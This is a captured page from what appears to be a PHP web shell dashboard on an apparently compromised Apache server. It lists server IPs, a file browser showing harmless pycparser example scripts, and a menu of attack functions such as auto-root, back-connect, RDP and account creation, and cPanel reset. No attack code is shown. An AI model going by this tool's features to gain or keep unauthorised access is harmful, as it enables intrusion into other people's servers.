Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.226.186.109
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-pycparser-2.14 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
c_files
[ DIR ]
drwxr-xr-x
c-to-c.py
1.42
KB
-rw-r--r--
cdecl.py
3.05
KB
-rw-r--r--
explore_ast.py
5.27
KB
-rw-r--r--
func_calls.py
1.08
KB
-rw-r--r--
func_defs.py
1.08
KB
-rw-r--r--
rewrite_ast.py
599
B
-rw-r--r--
using_cpp_libc.py
744
B
-rw-r--r--
using_gcc_E_libc.py
797
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rewrite_ast.py
#----------------------------------------------------------------- # pycparser: func_write.py # # Tiny example of rewriting a AST node # # Copyright (C) 2014, Akira Hayakawa # License: BSD #----------------------------------------------------------------- from __future__ import print_function import sys from pycparser import c_parser text = r""" void func(void) { x = 1; } """ parser = c_parser.CParser() ast = parser.parse(text) print("Before:") ast.show(offset=2) assign = ast.ext[0].body.block_items[0] assign.lvalue.name = "y" assign.rvalue.value = 2 print("After:") ast.show(offset=2)
Close